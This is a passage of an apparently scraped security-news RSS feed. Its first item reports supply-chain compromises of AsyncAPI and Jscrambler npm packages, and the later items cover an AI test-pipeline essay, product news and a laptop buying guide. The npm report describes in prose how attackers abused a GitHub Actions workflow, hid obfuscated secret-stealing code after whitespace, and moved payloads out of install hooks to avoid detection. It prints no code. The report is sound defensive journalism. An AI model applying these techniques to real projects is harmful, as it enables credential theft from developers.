<link>https://tsecurity.de/de/3671823/it-security-nachrichten/npm-ecosystem-hit-with-two-new-supply-chain-compromises/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671823/it-security-nachrichten/npm-ecosystem-hit-with-two-new-supply-chain-compromises/</guid>
<pubDate>Wed, 15 Jul 2026 22:38:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Attacks targeting developer ecosystems are increasing in frequency and sophistication, with Node.js developers firmly in this week’s crosshairs, as multiple npm packages belonging to the open-source AsyncAPI and Jscrambler Code Integrity were poisoned with malware following compromised development credentials.</p>



<p class="wp-block-paragraph">The incidents highlight the cascading effect of software supply chain attacks in which stolen credentials are then used to perpetrate additional compromises. Security researchers advise organizations to completely rebuild from clean images any developer machines that have installed a poisoned package — and to rotate all npm tokens, source control access, cloud credentials, CI/CD secrets, SSH keys, signing keys, and browser sessions.</p>



<p class="wp-block-paragraph">Affected packages include: <a href="mailto:jscrambler@8.14.0">jscrambler@8.14.0</a>, <a href="mailto:jscrambler@8.16.0">jscrambler@8.16.0</a>, <a href="mailto:jscrambler@8.17.0">jscrambler@8.17.0</a>, <a href="mailto:jscrambler@8.18.0">jscrambler@8.18.0</a>, <a href="mailto:jscrambler@8.20.0">jscrambler@8.20.0</a>, @asyncapi/generator-helpers@1.1.1, @asyncapi/generator-components@0.7.1, @asyncapi/generator@3.3.1, @asyncapi/specs@6.11.2 and @asyncapi/specs@6.11.2-alpha.1.</p>



<p class="wp-block-paragraph">However, packages that list any of the above poisoned packages as dependencies may also be impacted, including those from the same projects, such as jscrambler-webpack-plugin 8.6.2, gulp-jscrambler 8.6.2, grunt-jscrambler 8.5.2, and jscrambler-metro-plugin 9.0.2.</p>



<h2 class="wp-block-heading">Vulnerable GitHub Actions workflow used as entry point</h2>



<p class="wp-block-paragraph">The attack against AsyncAPI, an open-source reference specification and toolset for implementing event-driven architectures and asynchronous APIs, occurred on Tuesday and was independently detected by multiple security companies monitoring the npm registry, including Upwind, Socket.dev, Wiz, StepSecurity, and Aikido Security.</p>



<p class="wp-block-paragraph">According to the researchers’ analysis, attackers took advantage of a <a href="https://www.csoonline.com/article/4008621/github-actions-attack-renders-even-security-aware-orgs-vulnerable.html">known configuration vulnerability in a GitHub Actions CI/CD workflow</a> that had been reported in April. The flaw involves the <code>pull_request_target</code> event, which executes whenever a new pull request is made. When triggered, the workflow automatically checks out and executes the developer’s submitted pull request code in the Actions container, but this is done in the context of the base repository with full access to secrets.</p>



<p class="wp-block-paragraph">The AsyncAPI project had <a href="https://github.com/asyncapi/generator/pull/2092">a proposed fix</a> since May 17, but the fix had not yet gone through the full review and was not merged into the main branch.</p>



<p class="wp-block-paragraph">“At 05:08 UTC, the attacker opened PR #2155 containing a markdown file with obfuscated JavaScript hidden after approximately 1,000 bytes of whitespace,” researchers from Wiz explained <a href="https://www.wiz.io/blog/m-red-team-asyncapi-supply-chain-compromise-via-github-actions">in their report</a>. “The payload was designed to scan the GitHub Actions runner’s environment for secrets and exfiltrate them to a dead-drop URL on the rentry.co pastebin.”</p>



<p class="wp-block-paragraph">When a GitHub Actions workflow is triggered and is executed in an environment, a temporary <code>GITHUB_TOKEN</code> is generated to allow for authenticated git commands against the repository. Other tokens might also be included.</p>



<p class="wp-block-paragraph">In this case, the attackers managed to obtain a token associated with asyncapi-bot, a service account that had access across the entire AsyncAPI organization on GitHub. This allowed them to perform malicious code commits in two separate repositories. Those commits then triggered automated build workflows that generated and published the npm packages.</p>



<p class="wp-block-paragraph">The payload bundled in the packages shares some similarities with a malware framework called Miasma that was used in previous supply chain compromises. However, the malware code appears to be significantly different from previously documented variants.</p>



<p class="wp-block-paragraph">The first-stage code downloads a secondary trojan payload that has variants for Linux, Windows, and macOS. This is a modular malware framework with credential theft capabilities that targets passwords and cookies saved inside browsers, SSH keys, npm and GitHub tokens, AWS credentials, macOS Keychain, and cryptocurrency wallets.</p>



<p class="wp-block-paragraph">The trojan communicated with a command-and-control server and can accept remote commands to perform file operations, list directories, and exfiltrate data.</p>



<h2 class="wp-block-heading">Jscrambler compromised via leaked npm credential</h2>



<p class="wp-block-paragraph">The Jscrambler attack happened over the weekend on July 11 with attackers publishing multiple trojanized versions in two waves. Jscrambler Code Integrity is a client-side security library designed to protect JavaScript-based web and mobile applications against tampering and reverse engineering.</p>



<p class="wp-block-paragraph">Jscrambler published <a href="https://jscrambler.com/blog/security-advisory-malicious-npm-package">an advisory</a> in response to the incident in which it clarified that the attackers published malicious versions of the package using a npm publishing credential. However, unlike the AsyncAPI case, how that credential was leaked in the first place is not clear.</p>



<p class="wp-block-paragraph">Initially the attackers released new package versions with two malicious scripts that get executed at install time using a preinstall hook in the configuration script. The scripts also execute platform-specific binaries for Linux, macOS, and Windows embedded in an obfuscated container.</p>



<p class="wp-block-paragraph">Because <code>preinstall</code> or <code>postinstall</code> hooks are common ways to deliver malware in npm packages, they are automatically checked by security tools. To avoid detection, the attackers pivoted to a method that involved injecting the malicious code directly in the <code>dist/index.js</code> and <code>dist/bin/jscrambler.js</code> files. This changed the malware execution from package installation time to when the package gets imported into other projects or the Jscrambler CLI is invoked.</p>



<p class="wp-block-paragraph">The embedded malware executables for different platforms are written in Rust and, according to <a href="https://socket.dev/blog/jscrambler-supply-chain-attack">Socket.dev’s analysis</a>, were “a broad, developer-focused credential and secret harvester” that targeted browser-extension crypto wallets, API keys from AI coding assistants and MCP servers, cloud credentials for AWS, Azure and GCP, authentication tokens for messaging applications (such as Discord, Slack, and Telegram), password stores from browsers, Steam, and KDE.<br><br><br></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Codex Micro: Hardware von OpenAI zur Orchestrierung von Agenten für 280 Euro vorgestellt]]></title>
<description><![CDATA[OpenAI hat in der vergangenen Woche mit ChatGPT Work diverse Änderungen an der bisherigen Codex-App vorgenommen und auch neue Funktionen spendiert. Soviel zur Software-Seite. Gemeinsam mit Work Louder hat OpenAI Peripherie, sprich eine kleine Hardware-Tastatur entwickelt: den Codex Micro, genauer...]]></description>
<link>https://tsecurity.de/de/3671716/it-nachrichten/codex-micro-hardware-von-openai-zur-orchestrierung-von-agenten-fuer-280-euro-vorgestellt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671716/it-nachrichten/codex-micro-hardware-von-openai-zur-orchestrierung-von-agenten-fuer-280-euro-vorgestellt/</guid>
<pubDate>Wed, 15 Jul 2026 21:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI hat in der vergangenen Woche mit ChatGPT Work diverse Änderungen an der bisherigen Codex-App vorgenommen und auch neue Funktionen spendiert. Soviel zur Software-Seite. Gemeinsam mit Work Louder hat OpenAI Peripherie, sprich eine kleine Hardware-Tastatur entwickelt: den Codex Micro, genauer...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/codex-micro-hardware-von-openai-zur-orchestrierung-von-agenten-fuer-280-euro-vorgestellt/">Codex Micro: Hardware von OpenAI zur Orchestrierung von Agenten für 280 Euro vorgestellt</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What 80% AI-written test pipelines actually cost]]></title>
<description><![CDATA[The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?



After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the typing, not eighty percent o...]]></description>
<link>https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?</p>



<p class="wp-block-paragraph">After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the <em>typing</em>, not eighty percent of the <em>engineering</em>. The remaining twenty was where the work still lived. Budgeting for two percent of leftover effort was the mistake. When the real number was closer to thirty, that gap was the difference between a pipeline that shipped and one that quietly built up a queue of half-trusted features nobody could rely on.</p>



<p class="wp-block-paragraph">This piece is about that gap. As an independent research project on LLM-augmented testing methodology, I built a six-stage agentic pipeline that takes a design in Figma and produces running tests in WebDriverIO, connected end to end over the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. It works. It has been useful. And the parts that broke surprised me, because they were not the parts the hype cycle tells you to worry about.</p>



<h2 class="wp-block-heading">How I wired a six-stage pipeline over one protocol</h2>



<p class="wp-block-paragraph">The pipeline runs six stages in sequence, each owned by a different agent, with every handoff crossing MCP.</p>



<p class="wp-block-paragraph">Six-stage agentic test pipeline: design capture → requirements writer → ticket opener → code generator → test-case writer → automation generator. Each stage carries an MCP handoff and a provenance stamp.</p>



<p class="wp-block-paragraph">The end-to-end trace links a pull request back to a Jira ticket, a requirements section and a Figma frame. Each artifact is stamped with the agent that produced it, the model it used and the inputs it was given.</p>



<p class="wp-block-paragraph">MCP is the boring middle that makes any of this work. The cliché is that MCP is “USB-C for AI”: one open protocol, any tool. Like most analogies, it is about eighty percent right. The part that matters is the eighty: I do not have to write a custom adapter for every system the agent talks to. One MCP server per tool and every agent talks to all of them the same way.</p>



<p class="wp-block-paragraph"><strong>Typed handoffs between agents are my own architecture, layered on top of MCP rather than provided by it.</strong> Each agent writes a typed artifact the next agent reads. Each handoff is logged with provenance. When something went wrong six stages in, I could replay the chain. Without that discipline, a multi-agent pipeline is a debugger’s worst day. You know the test plan is wrong. You cannot tell whether the mistake came from the Figma read, the requirements interpretation or the ticket scaffolding. With it, I could point at exactly which stage went sideways and which inputs it was looking at when it did. The pattern lives in a <a href="https://github.com/SuneetMalhotra/agent-harness">public MIT-licensed reference implementation</a> for any reader who wants to run it.</p>



<p class="wp-block-paragraph"><strong>The sixteen-minute number is the marketing number.</strong> I ran the full chain end to end in about sixteen minutes on a synthetic net-new screen, Figma in, automation suite out. That repeated across my runs; it is not a demo trick. But sixteen minutes is the part of the story most fun to tell and least useful to learn from. It is what gets quoted in the all-hands. The hours that come after, when a human reviews each handoff, are where the work actually lives.</p>



<h2 class="wp-block-heading">What actually broke in production-style runs</h2>



<p class="wp-block-paragraph">The failures that stalled my pipeline were rarely the ones I expected.</p>



<p class="wp-block-paragraph">I expected hallucinated APIs. I got them: the agent confidently called endpoint names that sounded right but did not exist. I expected sparse-spec-in, sparse-spec-out, where a Figma frame with no annotations produced a requirements doc with vague acceptance criteria, every time. I expected locator drift, the common UI-automation failure mode where a renamed component silently breaks an entire test suite. There is solid <a href="https://martinfowler.com/articles/nonDeterminism.html">outside writing on non-determinism in tests</a> covering this whole family of failure modes, and the agent inherited every one.</p>



<p class="wp-block-paragraph">What I did not expect, and what kept the pipeline down longer than any of the above, was the plumbing.</p>



<p class="wp-block-paragraph">The model backend timed out under load. It lost credentials silently and started returning empty strings, which the agent then read as confidence. A duplicate consumer on a shared long-poll API endpoint produced an HTTP 409 conflict that broke delivery without throwing anything visible. One unguarded exception inside one agent aborted a whole shared scheduler run and took the other agents in the registry down with it. The single worst incident cost me three hours to find. An environment variable had silently rotated overnight; every agent in the fleet was returning structurally valid but semantically empty requirements docs; the downstream stages were dutifully generating tests against nothing.</p>



<p class="wp-block-paragraph">None of those are model bugs. They are infrastructure. The agent literature, which is what I went looking through when I started this work, mostly does not talk about them.</p>



<p class="wp-block-paragraph">The fix was not better prompts. It was <a href="https://martinfowler.com/bliki/CircuitBreaker.html">circuit-breaker-style</a> review checkpoints between stages and what I now call <strong>the four-guard discipline</strong>: four small guards I consider non-negotiable on any unattended agentic pipeline. The bulkhead pattern from microservices is the most consequential. An unhandled exception inside one agent can no longer abort the shared run; the offending agent fails fast with a structured error and the others keep going. Paired with that, a pure-data fallback ensures a model timeout produces a deterministic output explicitly marked as degraded mode, rather than an empty string the next stage will misread as confidence. A single-owner lease sits on every shared external endpoint, the cure for the duplicate-consumer incident that ate one of my Sunday afternoons. The cheapest guard was the last to arrive: a one-line synthetic canary every agent has to produce a known correct response to before any real work begins, so a credentials rotation or silent backend failure trips an alert before downstream stages have generated artifacts against garbage.</p>



<p class="wp-block-paragraph">None of these guards is novel. They are textbook stability patterns at a new boundary: the seam between the LLM agent and the rest of the system, which most of the existing agent literature still treats as a solved problem.</p>



<h2 class="wp-block-heading">The 20% you don’t see, and when not to do this</h2>



<p class="wp-block-paragraph">Here is the part the demo videos leave out. Even when the pipeline works, the human time per stage does not go to zero.</p>



<p class="wp-block-paragraph">Human review time per ticket across five pipeline stages: code review 60-180 min, automation review and flaky-fix loop 30-90 min, ticket architecture and sequencing 30-60 min, test data and environment 15-30 min, requirements review 20-30 min. Net: the human still spends 20-30% of the original effort, almost all of it reviewing rather than creating.</p>



<p class="wp-block-paragraph"><strong>Net of all that, the human still spends twenty to thirty percent of the original effort, almost all of it reviewing rather than creating.</strong> The pipeline saves seventy to eighty percent, not ninety-eight. The trap is budgeting for the two percent you do not save.</p>



<p class="wp-block-paragraph">When does this kind of pipeline make sense? In my experience, when the Figma is richly annotated and acceptance criteria are clear up front; when there is review capacity to absorb the work the pipeline shifts onto humans; when the stack is well represented in the training data; and when the feature is net-new rather than a deep edit of legacy code. When does it not? When the design lives on a whiteboard. When the integration touches old code with hidden contracts. When the path is regulated or safety-critical. When there is no senior reviewer who can hold the line. When the work is exploratory and writing the spec is the actual point of the exercise.</p>



<p class="wp-block-paragraph">Teams I have seen succeed with agentic pipelines budget for the rework explicitly, staff the review queue and treat the saved hours as capacity for harder problems rather than headcount they can release. Teams I have seen struggle did the opposite: declared victory at the demo and quietly accumulated a backlog of half-trusted features the next quarter had to clean up.</p>



<p class="wp-block-paragraph">The right unit of measurement is not how much the pipeline generates. It is how much of what it generates a human still has to touch before you would ship it. Call it <strong>the 80/20 rework rule</strong>: measure the rework, not the generation. The teams that get the rework number right are the ones whose AI investments compound. The teams that stop counting at the headline percentage are the ones that own the cleanup six months later.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.infoworld.com/expert-contributor-network/"><strong><u>Want to join?</u></strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[USM Haller wehrt sich gegen Designklau - und gewinnt! 🥳]]></title>
<description><![CDATA[Author: WBS LEGAL - Bewertung: 13x - Views:115 Ein Urteil, das die Rechte vieler Designer und Hersteller stärkt. Denn diese günstigen Designnachahmungen können einem Unternehmen das Genick brechen.

Wenn du dich davor schützen und auf Nummer sicher gehen willst, solltest du dein Design rechtssich...]]></description>
<link>https://tsecurity.de/de/3671090/videos/usm-haller-wehrt-sich-gegen-designklau-und-gewinnt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671090/videos/usm-haller-wehrt-sich-gegen-designklau-und-gewinnt/</guid>
<pubDate>Wed, 15 Jul 2026 17:02:04 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: WBS LEGAL - Bewertung: 13x - Views:115 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/x-ZzNw168wQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Ein Urteil, das die Rechte vieler Designer und Hersteller stärkt. Denn diese günstigen Designnachahmungen können einem Unternehmen das Genick brechen.<br />
<br />
Wenn du dich davor schützen und auf Nummer sicher gehen willst, solltest du dein Design rechtssicher anmelden. Wir von WBS.Legal helfen dir dabei ❗️👨🏻‍⚖️<br />
<br />
Gehe jetzt auf unsere Seite 👉🏼 wbs.law/design oder klicke direkt auf den Link in der Bio 🔗 und checke unsere Designrechts-Pakete aus. <br />
<br />
#design #wbslegal #recht2go #social #fürdich<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop Using If-Else Chains: Use the Registry Pattern in Python Instead]]></title>
<description><![CDATA[Learn a cleaner, more extensible way to dispatch logic in Python.]]></description>
<link>https://tsecurity.de/de/3670944/ai-nachrichten/stop-using-if-else-chains-use-the-registry-pattern-in-python-instead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670944/ai-nachrichten/stop-using-if-else-chains-use-the-registry-pattern-in-python-instead/</guid>
<pubDate>Wed, 15 Jul 2026 16:19:36 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Learn a cleaner, more extensible way to dispatch logic in Python.]]></content:encoded>
</item>
<item>
<title><![CDATA[KAPE 101: A Kroll Artifact Parser and Extractor Cheatsheet]]></title>
<description><![CDATA[Spend time performing forensic analysis on the Windows Operating System and you'll see a host of artifacts that can be used to identify adversary activity. From changes to the registry to the System Resource Utilization Monitor, Windows artifacts run deep. The challenge is locating, extracting, a...]]></description>
<link>https://tsecurity.de/de/3670892/it-security-nachrichten/kape-101-a-kroll-artifact-parser-and-extractor-cheatsheet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670892/it-security-nachrichten/kape-101-a-kroll-artifact-parser-and-extractor-cheatsheet/</guid>
<pubDate>Wed, 15 Jul 2026 16:08:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1280" height="720" src="https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1.png 1280w, https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1-500x281.png 500w, https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1-1024x576.png 1024w, https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1-768x432.png 768w" sizes="(max-width: 1280px) 100vw, 1280px"></p>
<p>Spend time performing forensic analysis on the Windows Operating System and you'll see a host of artifacts that can be used to identify adversary activity. From changes to the registry to the System Resource Utilization Monitor, Windows artifacts run deep. The challenge is locating, extracting, and parsing these artifacts in an efficient manner.</p>
<p>The post <a href="https://www.blackhillsinfosec.com/kape-cheatsheet/">KAPE 101: A Kroll Artifact Parser and Extractor Cheatsheet</a> appeared first on <a href="https://www.blackhillsinfosec.com/">Black Hills Information Security, Inc.</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[14, 15 oder 16 Zoll Laptop – welche Größe passt zu welchem Nutzerprofil?]]></title>
<description><![CDATA[Ein neuer Laptop ist eine Investition für die nächsten Jahre. Doch bevor man sich in Datenblättern zu Prozessoren, RAM und Grafikkarten verliert, steht die wichtigste und buchstäblich größte Entscheidung an: das Gehäuseformat. Schließlich bestimmt die Bildschirmdiagonale nicht nur, wie viel Arbei...]]></description>
<link>https://tsecurity.de/de/3670835/windows-tipps/14-15-oder-16-zoll-laptop-welche-groesse-passt-zu-welchem-nutzerprofil/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670835/windows-tipps/14-15-oder-16-zoll-laptop-welche-groesse-passt-zu-welchem-nutzerprofil/</guid>
<pubDate>Wed, 15 Jul 2026 15:42:33 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">neuer Laptop</a> ist eine Investition für die nächsten Jahre. Doch bevor man sich in Datenblättern zu Prozessoren, RAM und Grafikkarten verliert, steht die wichtigste und buchstäblich größte Entscheidung an: das Gehäuseformat. Schließlich bestimmt die Bildschirmdiagonale nicht nur, wie viel Arbeitsfläche Ihnen zur Verfügung steht – sie diktiert auch das Gewicht, die Akkugröße und die Kühlleistung Ihres neuen Systems.</p>



<p>Während vor wenigen Jahren noch der 15,6-Zöller als unangefochtener Standard galt, hat sich der Markt inzwischen gewandelt. Die Ränder um die Displays sind geschrumpft, moderne 16:10-Bildformate erobern die Schreibtische und stellen Käufer vor eine technologische Grundsatzfrage.</p>



<p>Die Eier legende Wollmilchsau gibt es nämlich auch hier nicht: Wer stundenlang <a href="https://www.pcwelt.de/article/2517080/die-besten-laptops-fuer-die-video-bearbeitung.html" target="_blank" rel="noreferrer noopener">Videos schneidet</a> oder Excel-Tabellen wälzt, flucht über einen zu kleinen Bildschirm. Wer sein Gerät hingegen täglich in der Bahn zum Pendeln nutzt, ärgert sich schnell über jedes Gramm zu viel im Rucksack. </p>



<p>Damit Sie beim Kauf nicht zum falschen Formfaktor greifen, dröseln wir die Stärken und Schwächen der drei wichtigsten Laptop-Größen auf und geben eine Kaufberatung für die unterschiedlichen Nutzerprofile.</p>



<h2 class="wp-block-heading">Die drei Display-Größen im Alltags-Check</h2>



<p>Um das Maximum aus Ihrem Budget herauszuholen, sollten Sie die Charakteristiken der Formfaktoren kennen. Jede Größe hat ein optimales Einsatzgebiet.</p>



<h2 class="wp-block-heading">1. 14-Zoll-Laptops: Mobile Begleiter für Pendler</h2>



<p>Der 14-Zöller (ca. 35,5 cm Diagonale) ist das gängige Format für alle, die häufig unterwegs sind. Moderne Fertigungstechniken erlauben ein Gerätegewicht von oft kaum mehr als einem Kilogramm, zudem sind die Geräte so dünn, dass sie problemlos in jede Aktentasche oder den Uni-Rucksack passen. </p>



<p>Durch das kompakte Gehäuse ist der Akkuverbrauch des Displays geringer, was oft zu ausgezeichneten Laufzeiten führt. Das Manko: Die kompakte Bauweise lässt wenig Platz für wuchtige Kühlsysteme oder dedizierte Grafikkarten. Zudem erfordert längeres Multitasking mit mehreren geöffneten Fenstern auf dem kleineren Bildschirm oft gute Augen oder cleveres Fenster-Management.</p>



<h3 class="wp-block-heading">Für wen eignen sich 14-Zoll-Laptops?</h3>



<p>Das Format ist besonders geeignet für Pendler, Studenten, Geschäftsreisende und alle, die ihren Laptop täglich transportieren. Wer primär textbasiert arbeitet, surft, streamt oder an Videocalls teilnimmt, wird die Leichtigkeit dieser Geräteklasse lieben.</p>



<h2 class="wp-block-heading">Produktempfehlung: ASUS Zenbook 14 OLED</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a578e3834be4"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ASUS-Zenbook-14-OLED-Laptop-bild2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="ASUS Zenbook 14 OLED Laptop Bild 2" class="wp-image-3169558" width="1200" height="822" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Asus</p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0DX2LSGSR?tag=pcwelt.de-21&amp;ascsubtag=4-0-3169538-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3169538-7-0-0-0-0">Asus Zenbook 14 OLED bei Amazon ansehen</a></div>


<p>Preis: 1.149 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 14 Zoll (35,6 cm), Seitenverhältnis 16:10, NanoEdge-Design (schmale Ränder)</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> 2,8 K (2.880 × 1.800 Pixel), Lumina-OLED-Panel</li>



<li><strong>Farbraum &amp; Helligkeit:</strong> 100 % DCI-P3-Abdeckung, maximale Spitzenhelligkeit 550 Nits</li>



<li><strong>Bildwiederholrate &amp; Reaktionszeit:</strong> 120 Hz, 0,2 ms (Herstellerangabe)</li>



<li><strong>Gewicht &amp; Maße:</strong> 1,2 kg, 14,9 mm Bauhöhe</li>



<li><strong>Prozessor &amp; Grafik:</strong> AMD Ryzen AI 7 350 (inklusive dedizierter NPU für KI-Berechnungen), integrierte AMD Radeon Grafikeinheit</li>



<li><strong>Speicher:</strong> 16 GB LPDDR5X RAM, 1 TB PCIe Gen4 x4 SSD</li>



<li><strong>Akkukapazität:</strong> 75 Wh (laut Hersteller ausgelegt auf hohe Langlebigkeit mit 70 % Restkapazität nach 1200 Ladezyklen)</li>



<li><strong>Audio &amp; Extras:</strong> Soundsystem von Harman Kardon mit Dolby Atmos und KI-Geräuschunterdrückung, beleuchtete Tastatur (QWERTZ-Layout)</li>



<li><strong>Betriebssystem:</strong> Windows 11 Home (Copilot+ PC zertifiziert)</li>
</ul>



<p>Das <a href="https://www.amazon.de/dp/B0DX2LSGSR?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Asus Zenbook 14 OLED</a> demonstriert anschaulich, warum 14-Zöller aktuell so beliebt sind. Trotz des geringen Gewichts von nur 1,2 Kilogramm bietet das Notebook mit seinem AMD Ryzen AI 7 350 Prozessor und 16 GB Arbeitsspeicher genügend Leistungsreserven für Office-Anwendungen, Multitasking und leichte Bildbearbeitung. Das hochauflösende 2,8K-OLED-Display mit 120 Hz sorgt dabei für eine scharfe Darstellung, kräftige Farben und flüssige Bildabläufe.</p>



<p>Ein praktisches Detail für den mobilen Alltag ist dabei auch das kompakte Gehäuse mit nur 14,9 Millimetern Bauhöhe. Gleichzeitig verbaut Asus einen großzügigen 75-Wh-Akku, der laut Hersteller Laufzeiten von bis zu 18 Stunden ermöglichen soll. Die Ausstattung wird speziell für Videokonferenzen und Multimedia-Anwendungen durch Dolby-Atmos-Lautsprecher von Harman Kardon sowie eine integrierte KI-Geräuschunterdrückung abgerundet.</p>



<h2 class="wp-block-heading">2. 15-Zoll-Laptops: Preisbewusste Allrounder</h2>



<p>Das 15-Zoll-Segment gilt bis heute als der klassische Mittelweg zwischen Mobilität und Arbeitsfläche. Je nach Hersteller kommen im 15-Zoll-Bereich sowohl klassische 16:9- als auch moderne 16:10-Displays zum Einsatz.</p>



<p>Das 16:9-Format eignet sich besonders gut für den Medienkonsum, etwa für Filme und Serien, ohne störende schwarze Balken. Das 16:10-Format bietet dagegen mehr vertikale Bildschirmfläche – ein Vorteil beim Arbeiten mit Dokumenten, Tabellen oder längeren Webseiten.</p>



<p>Weil die Gehäuse oft auf bewährten, kostengünstigen Chassis-Designs der Hersteller basieren, bekommt man in dieser Klasse in der Regel das meiste Datenblatt für sein Geld. Zudem bieten 15-Zöller fast immer einen vollwertigen, physischen Nummernblock auf der rechten Seite der Tastatur.</p>



<h3 class="wp-block-heading">Für wen eignen sich 15-Zoll-Laptops?</h3>



<p>Der klassische 15-Zöller richtet sich an preisbewusste Käufer, Homeoffice-Nutzer, die keinen externen Monitor besitzen, und Nutzer, die ihr Notebook meistens in der Wohnung einsetzen oder das Gerät nur gelegentlich mit auf Reisen nehmen.</p>



<h2 class="wp-block-heading">Produktempfehlung: Lenovo IdeaPad Slim 3 (15″)</h2>


